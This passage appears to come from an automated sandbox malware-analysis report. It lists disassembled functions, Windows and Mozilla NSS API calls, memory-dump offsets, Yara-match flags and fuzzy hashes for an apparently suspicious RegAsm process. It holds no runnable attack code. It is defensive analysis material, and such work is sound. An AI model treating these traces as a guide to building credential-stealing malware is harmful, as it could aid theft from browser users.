                                                                                      • Part of subcall function 6CDFC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDFC2BF
                                                                                    • PR_EnterMonitor.NSS3(?), ref: 6CDE2D02
                                                                                    • PR_EnterMonitor.NSS3(?), ref: 6CDE2D1F
                                                                                    • PR_ExitMonitor.NSS3(?), ref: 6CDE2D42
                                                                                    • PR_ExitMonitor.NSS3(?), ref: 6CDE2D5B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537650615.000000006CCD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538473689.000000006CEAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538508502.000000006CEAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538542365.000000006CEB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538578827.000000006CEB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6ccd0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                    • String ID:
                                                                                    • API String ID: 1593528140-0
                                                                                    • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                    • Instruction ID: 2539fa3481d071394ebff271d881d9523d02c17dbefc2995426b826ff80b551f
                                                                                    • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                    • Instruction Fuzzy Hash: 3C01A5F19042019BE6309F26FC40BC7B7B1EB4931CF104529E95E86B30E632E82586D2
                                                                                    Function 6CC70D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6CC33DEF), ref: 6CC70D71
                                                                                    • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6CC33DEF), ref: 6CC70D84
                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6CC33DEF), ref: 6CC70DAF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$Free$Alloc
                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                    • API String ID: 1852963964-2186867486
                                                                                    • Opcode ID: 6f730dbb6f9c357720b2669d45caf81135c55ce3d955cfe109b6707d376b0632
                                                                                    • Instruction ID: ed51de8d2d7eef2df0f80b77432702700bdf6d47bcaf8881dd2f86a48eec840e
                                                                                    • Opcode Fuzzy Hash: 6f730dbb6f9c357720b2669d45caf81135c55ce3d955cfe109b6707d376b0632
                                                                                    • Instruction Fuzzy Hash: 52F0E93138079423E63012AB4D0AB5B376DFBC2B65F304075F204EE9C0FAA2E80047B8
                                                                                    Function 6CC95850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(000000FF), ref: 6CC9586C
                                                                                    • CloseHandle.KERNEL32 ref: 6CC95878
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CC95898
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CC958C9
                                                                                    • free.MOZGLUE(00000000), ref: 6CC958D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CloseHandleObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1910681409-0
                                                                                    • Opcode ID: 3cccefe91040a703f68d8d686051806a1b26e6897f109db7ce2e3edfabe5b371
                                                                                    • Instruction ID: 8cb5dbf31703410ab4f413fe42e937b6866be32fc63f2096b07e7063378b6c7b
                                                                                    • Opcode Fuzzy Hash: 3cccefe91040a703f68d8d686051806a1b26e6897f109db7ce2e3edfabe5b371
                                                                                    • Instruction Fuzzy Hash: 0701627D7441019FDF00DFDADA086067BB8FB83329B644136E419C2310E73198198F9D
                                                                                    Function 6CC87620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6CC875C4,?), ref: 6CC8762B
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6CC874D7,6CC915FC,?,?,?), ref: 6CC87644
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8765A
                                                                                    • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CC874D7,6CC915FC,?,?,?), ref: 6CC87663
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CC874D7,6CC915FC,?,?,?), ref: 6CC87677
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 418114769-0
                                                                                    • Opcode ID: 2b8a37575f70c4ecb85a45a8fe06e1cfe9045c8c864f73656a186ff335a86b5a
                                                                                    • Instruction ID: 5f84838fa65a370b81a3812a0cc6e4dc76c691beb0d4ead1002433844cca6dea
                                                                                    • Opcode Fuzzy Hash: 2b8a37575f70c4ecb85a45a8fe06e1cfe9045c8c864f73656a186ff335a86b5a
                                                                                    • Instruction Fuzzy Hash: 72F0AF71E10785ABD7008F61C898676B778FFEA259F114316F90443611E7B0A5D08BD0
                                                                                    Function 0041A151 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __getptd.LIBCMT ref: 0041A15D
                                                                                      • Part of subcall function 0041A334: __getptd_noexit.LIBCMT ref: 0041A337
                                                                                      • Part of subcall function 0041A334: __amsg_exit.LIBCMT ref: 0041A344
                                                                                    • __getptd.LIBCMT ref: 0041A174
                                                                                    • __amsg_exit.LIBCMT ref: 0041A182
                                                                                    • __lock.LIBCMT ref: 0041A192
                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0041A1A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                    • String ID:
                                                                                    • API String ID: 938513278-0
                                                                                    • Opcode ID: fcb0c8642110b7015162a0e932f9910050fd6d813dd674022f7660195b50bfe9
                                                                                    • Instruction ID: 4842968eac2c6e991ae9de06a13d24e5a1eac83dd62c561922409ec9b0e15fd1
                                                                                    • Opcode Fuzzy Hash: fcb0c8642110b7015162a0e932f9910050fd6d813dd674022f7660195b50bfe9
                                                                                    • Instruction Fuzzy Hash: C6F03632A46610BBDB25BB665806BDD73905F00739F54410FF414662D3CB7C59D1CA5F
                                                                                    Function 00407893 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 441stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00407898
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00407DE7
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00407DFB
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                      • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                      • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                      • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$AllocCreateLocalObjectSingleThreadWaitmemcmpmemset
                                                                                    • String ID: #
                                                                                    • API String ID: 3207582090-1885708031
                                                                                    • Opcode ID: 4ecc4832899fac776391c8da2cf9c5fddb3acc767da0c9f683104648ff689546
                                                                                    • Instruction ID: 2b191016455699362fcd8800b651534acdba5a724bbeaf5e9f6c94e3a6660c1a
                                                                                    • Opcode Fuzzy Hash: 4ecc4832899fac776391c8da2cf9c5fddb3acc767da0c9f683104648ff689546
                                                                                    • Instruction Fuzzy Hash: 95125B7180424DEADB15EBE0C956BEEBB74AF18308F5040BEE406725C2DB78174DDB66
                                                                                    Function 6CC91700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC91800
                                                                                      • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                                      • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                                      • Part of subcall function 6CC34290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC73EBD,6CC73EBD,00000000), ref: 6CC342A9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                                    • String ID: Details$name${marker.name} - {marker.data.name}
                                                                                    • API String ID: 46770647-1733325692
                                                                                    • Opcode ID: 995c73df8f6356d2ba5b30a447ffc2068d64873becc3a2df5529bf0a0407fe06
                                                                                    • Instruction ID: a5891527008dc0ecd9b7240de715659ce99935eaf5326d9181fe0ebb85e390cb
                                                                                    • Opcode Fuzzy Hash: 995c73df8f6356d2ba5b30a447ffc2068d64873becc3a2df5529bf0a0407fe06
                                                                                    • Instruction Fuzzy Hash: E1710270A007469FCB04CF68D49079ABBB5FF85304F00466DD8195BB41EB71B6A8CBE1
                                                                                    Function 6CC9B0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • free.MOZGLUE(?,?,6CC9B0A6,6CC9B0A6,?,6CC9AF67,?,00000010,?,6CC9AF67,?,00000010,00000000,?,?,6CC9AB1F), ref: 6CC9B1F2
                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6CC9B0A6,6CC9B0A6,?,6CC9AF67,?,00000010,?,6CC9AF67,?,00000010,00000000,?), ref: 6CC9B1FF
                                                                                    • free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6CC9B0A6,6CC9B0A6,?,6CC9AF67,?,00000010,?,6CC9AF67,?,00000010), ref: 6CC9B25F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$Xlength_error@std@@
                                                                                    • String ID: map/set<T> too long
                                                                                    • API String ID: 1922495194-1285458680
                                                                                    • Opcode ID: 46755a798d489d960d1e51a683cd40ee1851beb90b7205f47c7e979d66bcea86
                                                                                    • Instruction ID: dfdbc7fd8e3037973d1f0b87857b0ce1e35262c6bf458a2fb2f5787549ad38b3
                                                                                    • Opcode Fuzzy Hash: 46755a798d489d960d1e51a683cd40ee1851beb90b7205f47c7e979d66bcea86
                                                                                    • Instruction Fuzzy Hash: 66619B74604645AFDB11CF19C890A9ABBF1FF4A318F28C1A9D8598FB52E331EC45CB91
                                                                                    Function 6CC5D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                                      • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D4F2
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D50B
                                                                                      • Part of subcall function 6CC3CFE0: EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC3CFF6
                                                                                      • Part of subcall function 6CC3CFE0: LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC3D026
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D52E
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC5D690
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D751
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                    • String ID: MOZ_CRASH()
                                                                                    • API String ID: 3805649505-2608361144
                                                                                    • Opcode ID: 9324e62dece960d2490d874f64007249107d7a9f1e92cbd2ac88fad31ac84f05
                                                                                    • Instruction ID: 0d1f7d30113175e48c008f9823ff459383209b486944bb581d9d8af081d69c90
                                                                                    • Opcode Fuzzy Hash: 9324e62dece960d2490d874f64007249107d7a9f1e92cbd2ac88fad31ac84f05
                                                                                    • Instruction Fuzzy Hash: CA510171A047018FD714CF69C2D021AB7F1EB89744FA44A2EE59AD7F84EB70E821CB85
                                                                                    Function 6CC84630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldiv
                                                                                    • String ID: -%llu$.$profiler-paused
                                                                                    • API String ID: 3732870572-2661126502
                                                                                    • Opcode ID: e50acc06b729fa1e0b1f2cc62a80a174153e63e6c25daee0ddadc92d981462c8
                                                                                    • Instruction ID: ac55f1f030cb56c0be428795b31f8d0d60ac0c4f57ef4aaeee18c4939347482d
                                                                                    • Opcode Fuzzy Hash: e50acc06b729fa1e0b1f2cc62a80a174153e63e6c25daee0ddadc92d981462c8
                                                                                    • Instruction Fuzzy Hash: 28414771A056089FCB08DFB9E8A115FBBF9AF85748F11863EE845ABB41FB309805C741
                                                                                    Function 6CCA9830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6CCA985D
                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6CCA987D
                                                                                    • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6CCA98DE
                                                                                    Strings
                                                                                    • ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6CCA98D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                                                                    • String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                                                                    • API String ID: 1778083764-3290996778
                                                                                    • Opcode ID: ea83a8ddd7f29d2339ae01e4f3e1613e2749a6116391e8ee59b03d2a37edb080
                                                                                    • Instruction ID: 006b3613d92437f6893f089e862bf9485d2b8e81337ec4b2c1f8080ea5bedf93
                                                                                    • Opcode Fuzzy Hash: ea83a8ddd7f29d2339ae01e4f3e1613e2749a6116391e8ee59b03d2a37edb080
                                                                                    • Instruction Fuzzy Hash: 2A313875B001086FDF04AF99D8545EF77B8DF89714F40442DEA0AABB40EB315905CBD1
                                                                                    Function 6CC846E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __aulldiv.LIBCMT ref: 6CC84721
                                                                                      • Part of subcall function 6CC34410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6CC73EBD,00000017,?,00000000,?,6CC73EBD,?,?,6CC342D2), ref: 6CC34444
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldiv__stdio_common_vsprintf
                                                                                    • String ID: -%llu$.$profiler-paused
                                                                                    • API String ID: 680628322-2661126502
                                                                                    • Opcode ID: d1d6f89a7f23acc32b07ea59fd43b6308102e64b718f859a58da51ce8f91eece
                                                                                    • Instruction ID: 5e48483350d0f2db4af953b6ae2c810f674d78901716a2086dd20c3926066b26
                                                                                    • Opcode Fuzzy Hash: d1d6f89a7f23acc32b07ea59fd43b6308102e64b718f859a58da51ce8f91eece
                                                                                    • Instruction Fuzzy Hash: 8E310A71F052185BCB08CFADD8A569E7FE69B89318F15453EE8059BB41F7749804CB50
                                                                                    Function 6CC8B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC34290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC73EBD,6CC73EBD,00000000), ref: 6CC342A9
                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CC8B127), ref: 6CC8B463
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC8B4C9
                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CC8B4E4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
